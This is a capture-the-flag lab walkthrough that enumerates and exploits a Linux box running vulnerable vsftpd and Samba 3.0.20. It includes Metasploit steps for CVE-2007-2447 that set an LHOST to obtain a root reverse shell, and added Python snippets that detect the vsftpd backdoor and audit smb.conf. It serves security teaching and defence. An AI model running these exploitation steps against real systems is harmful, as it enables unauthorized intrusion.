Introduction
In this lab, we will perform reconnaissance and exploitation on a target system with the IP address 10.10.10.3. Our goal is to gain unauthorized access to the system and retrieve both the user and root flags. We will employ various tools and techniques to achieve this objective.
Fingerprinting
To begin, we need to gather information about the target system. We start by determining the operating system using the TTL value obtained from a ping to the server:
ping 10.10.10.3
The TTL value of 63 suggests that the target system is likely running Linux.
Next, we conduct a basic nmap scan to identify open ports and services:
nmap 10.10.10.3
Unfortunately, the scan reports that the host appears to be down. To overcome this issue, we instruct nmap to treat the target system as online:
nmap -Pn 10.10.10.3
This time, we receive some results. To gather more detailed information about the detected versions and services, we run additional probes and save the results for reference:
nmap -sV -Pn 10.10.10.3 -oN nmap.txt
The scan reveals several open ports with corresponding services and versions:
PORT | STATE | SERVICE | VERSION |
---|---|---|---|
21/tcp | open | ftp | vsftpd 2.3.4 |
22/tcp | open | ssh | OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) |
139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
445/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
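As an added example (not part of the original writeup), the following Python parses the normal-format output saved with `-oN` into records and flags versions that the writeup itself ties to known CVEs; the sample output and the watchlist are constructed for illustration.

```python
import re
from collections import namedtuple

# Constructed sample of `nmap -sV -oN nmap.txt` normal output, built to match
# the services the writeup found (not the lab's actual nmap.txt).
NMAP_TXT = """\
# Nmap 7.94 scan initiated as: nmap -sV -Pn 10.10.10.3 -oN nmap.txt
Nmap scan report for 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
"""

# One port line of nmap normal output: "<port>/<proto> <state> <service> <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Version strings the writeup itself ties to CVEs. A production checker would
# consult a vulnerability feed rather than this hand-written list.
WATCHLIST = {
    "vsftpd 2.3.4": "CVE-2011-2523 (backdoored release)",
    "Samba smbd 3.0.20": "CVE-2007-2447 (username map script)",
}

Service = namedtuple("Service", "port proto state name version")

def parse_nmap_normal(text: str) -> list[Service]:
    """Turn the port table of nmap -oN output into Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version))
    return services

def flag_services(services: list[Service]) -> dict[int, str]:
    """Map port -> reason for every open service whose version is on the watchlist."""
    flagged = {}
    for s in services:
        for prefix, reason in WATCHLIST.items():
            if s.state == "open" and s.version.startswith(prefix):
                flagged[s.port] = reason
    return flagged
```

Note that `-sV` alone reports Samba only as "3.X - 4.X", so nothing on 139/445 is flagged here; that is why the writeup later runs the default scripts against port 445 to pin down the exact version.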
FTP
Let’s begin by attempting to log in anonymously to the FTP service:
ftp anonymous@10.10.10.3
Although the login is successful, we cannot see any files in the FTP directory. To gather more information, we search for the version of the FTP service in searchsploit:
searchsploit vsftpd
The search reveals two entries of interest: a Backdoor Command Execution exploit and its corresponding Metasploit module. To further investigate, we inspect the exploit:
searchsploit vsftpd -x 49757
At the top of the output, we find the CVE number CVE-2011-2523. Performing an internet search leads us to a relevant GitHub repository, which explains that logging in with the username ‘:)’ opens a command shell on port 6200. However, when we attempt this method, it does not work. Alternatively, we can try using Metasploit:
msfconsole
search vsftpd
use 0
info
set RHOST 10.10.10.3
run
Although Metasploit reports a successful execution, it does not create a shell. Referring back to the GitHub repository, we discover that this exploit only works on specific compromised versions. Therefore, we can conclude that the version on our target system is not vulnerable, and we should explore other avenues.
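From the defender's side, the two artefacts the writeup describes (a login attempt whose username carries ‘:)’ and a vsftpd process listening on port 6200) are both easy to check for. The following Python is an added example, not from the writeup; the vsftpd.log lines and the `ss -ltnp` output are constructed samples.

```python
import re

# Constructed sample vsftpd.log lines (not from the lab host). The last
# login uses a username containing ":)", the trigger described in the writeup.
VSFTPD_LOG = """\
Sat Jun  3 12:00:00 2023 [pid 1201] CONNECT: Client "10.10.14.4"
Sat Jun  3 12:00:01 2023 [pid 1200] [anonymous] OK LOGIN: Client "10.10.14.4"
Sat Jun  3 12:00:05 2023 [pid 1211] CONNECT: Client "10.10.14.4"
Sat Jun  3 12:00:06 2023 [pid 1210] [user:)] FAIL LOGIN: Client "10.10.14.4"
"""

# Constructed `ss -ltnp` output showing vsftpd with an unexpected listener.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      32           0.0.0.0:21        0.0.0.0:*     users:(("vsftpd",pid=1100,fd=3))
LISTEN 0      1            0.0.0.0:6200      0.0.0.0:*     users:(("vsftpd",pid=1210,fd=5))
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=900,fd=3))
"""

LOGIN_LINE = re.compile(r'\[pid \d+\] \[([^\]]*)\] (OK|FAIL) LOGIN: Client "([^"]+)"')
LISTEN_LINE = re.compile(r'^LISTEN\s+\S+\s+\S+\s+\S+:(\d+)\s+\S+\s+users:\(\("([^"]+)"')
BACKDOOR_TRIGGER = ":)"

def suspicious_logins(log_text: str) -> list[tuple[str, str]]:
    """Return (client, username) for login attempts whose username carries the trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_LINE.search(line)
        if m and BACKDOOR_TRIGGER in m.group(1):
            hits.append((m.group(3), m.group(1)))
    return hits

def unexpected_vsftpd_listeners(ss_text: str, expected_ports=(21,)) -> list[int]:
    """Ports where a vsftpd process listens other than the FTP control port."""
    ports = []
    for line in ss_text.splitlines():
        m = LISTEN_LINE.match(line)
        if m and m.group(2) == "vsftpd" and int(m.group(1)) not in expected_ports:
            ports.append(int(m.group(1)))
    return ports
```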
Samba
We decide to shift our focus to the exploitation of the Samba service on the target system. To assist us in this endeavor, we refer to the Samba Resources for guidance.
To begin, we use SMBmap to perform an anonymous session scan on the Samba shares:
smbmap -H 10.10.10.3
The scan reveals the following shares with their corresponding permissions and comments:
Disk | Permissions | Comment |
---|---|---|
print$ | NO ACCESS | Printer Drivers |
tmp | READ, WRITE | oh noes! |
opt | NO ACCESS | |
IPC$ | NO ACCESS | IPC Service (lame server (Samba 3.0.20-Debian)) |
ADMIN$ | NO ACCESS | IPC Service (lame server (Samba 3.0.20-Debian)) |
We observe that our null session has access to the “tmp” share. To further investigate, we utilize SMBClient to connect to the share without a password:
smbclient //10.10.10.3/tmp --no-pass
By navigating through the share using the “ls” and “cd” commands, we identify a file of potential interest: “vgauthsvclog.txt.0”. Let’s retrieve a local copy for inspection:
get vgauthsvclog.txt.0
Upon inspecting the file, we find a reference to another file that we don’t currently have access to: “/etc/vmware-tools/vgauth.conf”. This file may contain valuable information.
Since we still need to determine the version of Samba running on the target system, we resort to default scripts to gather this information:
nmap 10.10.10.3 -sC -Pn -p 445
The scan outputs the Samba version as “Samba 3.0.20-Debian”. Armed with this knowledge, we utilise searchsploit to explore potential exploits:
searchsploit samba 3.0.20
The search results reveal several options, among which the most promising exploit appears to be a username map script leading to command execution. Further inspection of the exploit discloses that it corresponds to CVE-2007-2447. Additional research informs us that this vulnerability leverages MS-RPC to pass unfiltered input to “/bin/sh”. To attempt exploitation, we turn to Metasploit:
msfconsole
search samba 3.0.20
use 0
info
set RHOST 10.10.10.3
set LHOST 10.10.14.4
run
Success! We have obtained a shell on the target system.
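Both weaknesses the Samba section relied on are visible in smb.conf: the `username map script` directive behind CVE-2007-2447 and a share that null-session clients can write to (the “tmp” share above). The following Python audit is an added example, not the writeup's or the lab's configuration; both smb.conf fragments are constructed and the script path is a hypothetical placeholder.

```python
import configparser

# Constructed smb.conf fragments, not the lab host's real configuration. The weak
# one mirrors the writeup's findings: a "tmp" share writable over a null session
# plus the "username map script" directive (CVE-2007-2447); the path is made up.
WEAK_SMB_CONF = """\
[global]
   map to guest = Bad User
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   read only = no
   guest ok = yes
"""

HARDENED_SMB_CONF = """\
[global]
   map to guest = Never
[tmp]
   path = /tmp
   read only = yes
   guest ok = no
"""

YES = {"yes", "true", "1"}

def share_is_writable(sec) -> bool:
    """Samba: a share is writable when 'read only = no' or 'writ(e)able = yes'."""
    if sec.get("read only", "yes").lower() not in YES:
        return True
    return any(sec.get(k, "no").lower() in YES for k in ("writable", "writeable"))

def audit_smb_conf(text: str) -> list[tuple[str, str]]:
    """Return (section, finding) pairs for the two weaknesses the writeup used."""
    # Strip indentation first: configparser would otherwise read the indented
    # smb.conf lines as continuations of the previous value.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string("\n".join(l.strip() for l in text.splitlines()))
    findings = []
    if cp.has_option("global", "username map script"):
        findings.append(("global", "username map script set: root cause of "
                         "CVE-2007-2447; remove it and run a patched release"))
    for name in cp.sections():
        if name == "global": continue
        sec = cp[name]
        guest = any(sec.get(k, "no").lower() in YES for k in ("guest ok", "public"))
        if guest and share_is_writable(sec):
            findings.append((name, "anonymous (null session) clients can write here"))
    return findings
```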
Enumeration
Now that we have a foothold on the target system, our next step is to stabilise the shell. We notice that Python 2 is available:
python -c "import pty;pty.spawn('/bin/bash')"
With a more interactive shell, we proceed to gather additional information:
whoami # root
Remarkably, we discover that we already have root-level access on the system.
User Flag
Let’s retrieve the user flag from the “/home/makis/user.txt” file:
cat /home/makis/user.txt
Root Flag
Next, we retrieve the root flag from the “/root/root.txt” file:
cat /root/root.txt
Conclusion
In this lab writeup, we successfully performed reconnaissance and exploitation on a target system. Through fingerprinting, we identified the operating system and discovered open ports and services. We attempted FTP and Samba exploits, leveraging vulnerabilities to gain unauthorized access. Our enumeration efforts led us to the user and root flags, confirming our successful penetration of the target system.
It is essential to approach such activities with caution and only conduct them within legal and authorized environments. This lab serves as a valuable exercise for understanding the significance of proper reconnaissance, vulnerability identification, and exploitation in the field of cybersecurity.